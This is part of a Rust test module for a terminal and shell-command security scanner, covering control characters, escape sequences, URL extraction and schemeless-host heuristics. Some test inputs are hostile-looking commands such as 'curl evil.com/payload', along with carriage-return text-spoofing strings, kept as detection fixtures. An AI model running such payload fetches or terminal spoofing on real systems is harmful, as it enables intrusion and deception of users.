    fn test_strip_quotes_empty() {
        assert_eq!(strip_quotes(""), "");
    }

    #[test]
    fn test_scan_bytes_bel_vt_del() {
        // BEL (0x07)
        let input = b"hello\x07world";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        // VT (0x0B)
        let input = b"hello\x0Bworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        // FF (0x0C)
        let input = b"hello\x0Cworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);

        // DEL (0x7F)
        let input = b"hello\x7Fworld";
        let result = scan_bytes(input);
        assert!(result.has_control_chars);
    }

    #[test]
    fn test_scan_bytes_osc_apc_dcs() {
        // OSC: \e]
        let input = b"hello\x1b]0;title\x07world";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);

        // APC: \e_
        let input = b"hello\x1b_dataworld";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);

        // DCS: \eP
        let input = b"hello\x1bPdataworld";
        let result = scan_bytes(input);
        assert!(result.has_ansi_escapes);
    }

    #[test]
    fn test_schemeless_long_tld() {
        assert!(looks_like_schemeless_host("example.academy"));
        assert!(looks_like_schemeless_host("example.photography"));
    }

    #[test]
    fn test_segment_index_correct() {
        let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
        // Each URL should have the segment index of the segment it came from
        for url in &urls {
            // segment_index should be 0 or 1, not an incrementing counter
            assert!(url.segment_index <= 1);
        }
    }

    #[test]
    fn test_docker_build_context_not_image() {
        let urls = extract_urls("docker build .", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(
            docker_urls.len(),
            0,
            "build context '.' should not be treated as image"
        );
    }

    #[test]
    fn test_docker_image_subcmd() {
        let urls = extract_urls("docker image pull nginx", ShellType::Posix);
        let docker_urls: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
            .collect();
        assert_eq!(docker_urls.len(), 1);
    }

    /// Constraint #2: Verify that EXTRACTOR_IDS is non-empty and
    /// that all generated fragment counts are positive.
    /// This is a module boundary enforcement test — ensures no secret
    /// extractors exist outside the declarative pattern table.
    #[test]
    fn test_tier1_module_boundary_enforcement() {
        // Verify extractor IDs are generated
        let ids = tier1_generated::EXTRACTOR_IDS;
        assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
        // Verify exec and paste fragment counts
        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
        assert!(exec_count > 0, "Must have exec fragments");
        assert!(
            paste_count >= exec_count,
            "Paste fragments must be superset of exec fragments"
        );
        // Verify the generated patterns are valid regexes
        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
            .expect("Generated exec pattern must be valid regex");
        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
            .expect("Generated paste pattern must be valid regex");
    }

    // ─── CR normalization tests ───
    // Line-terminating \r (trailing, or part of \r\n) is benign; only a
    // \r followed by a non-\n byte is treated as a control character.

    #[test]
    fn test_scan_bytes_trailing_cr_not_flagged() {
        let result = scan_bytes(b"/path\r");
        assert!(
            !result.has_control_chars,
            "trailing \\r should not be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_trailing_crlf_not_flagged() {
        let result = scan_bytes(b"/path\r\n");
        assert!(
            !result.has_control_chars,
            "trailing \\r\\n should not be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_windows_multiline_not_flagged() {
        let result = scan_bytes(b"line1\r\nline2\r\n");
        assert!(
            !result.has_control_chars,
            "Windows \\r\\n line endings should not be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_embedded_cr_still_flagged() {
        let result = scan_bytes(b"safe\rmalicious");
        assert!(
            result.has_control_chars,
            "embedded \\r before non-\\n should be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_mixed_crlf_and_attack_cr() {
        let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
        assert!(
            result.has_control_chars,
            "attack \\r mixed with \\r\\n should be flagged"
        );
    }

    #[test]
    fn test_scan_bytes_only_cr() {
        let result = scan_bytes(b"\r");
        assert!(
            !result.has_control_chars,
            "lone trailing \\r should not be flagged"
        );
    }

    // ─── Schemeless host heuristics ───
    // Output-file arguments (curl -o / wget -O) and bare filenames must
    // not be mistaken for schemeless URLs; real domains still are.

    #[test]
    fn test_schemeless_skip_curl_output_flag() {
        let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
        // Should NOT have schemeless URL for lenna.png
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "lenna.png should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_skip_curl_output_combined() {
        let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "-olenna.png should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_skip_wget_output_flag() {
        let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "output.html should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_skip_wget_combined() {
        let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            schemeless.is_empty(),
            "-Ooutput.html should not be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_real_domain_still_detected() {
        let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            !schemeless.is_empty(),
            "evil.com/payload should be detected as schemeless URL"
        );
    }

    #[test]
    fn test_schemeless_png_no_slash_is_file() {
        assert!(!looks_like_schemeless_host("lenna.png"));
    }

    #[test]
    fn test_schemeless_tld_overlap_with_path_is_domain() {
        // evil.zip/payload has a path component, so the .zip extension heuristic
        // should NOT suppress it — evil.zip is a real TLD and this is a domain.
        assert!(looks_like_schemeless_host("evil.zip/payload"));
        assert!(looks_like_schemeless_host("evil.sh/payload"));
    }

    #[test]
    fn test_schemeless_tld_overlap_without_path_is_file() {
        // Without a path, lenna.zip / script.sh look like filenames, not domains.
        assert!(!looks_like_schemeless_host("lenna.zip"));
        assert!(!looks_like_schemeless_host("script.sh"));
    }

    #[test]
    fn test_schemeless_tld_overlap_sink_context_detected() {
        // In a real sink context, evil.zip/payload should be detected as schemeless URL.
        let urls = extract_urls("curl evil.zip/payload", ShellType::Posix);
        let schemeless: Vec<_> = urls
            .iter()
            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
            .collect();
        assert!(
            !schemeless.is_empty(),
            "evil.zip/payload should be detected as schemeless URL in sink context"
        );
    }
}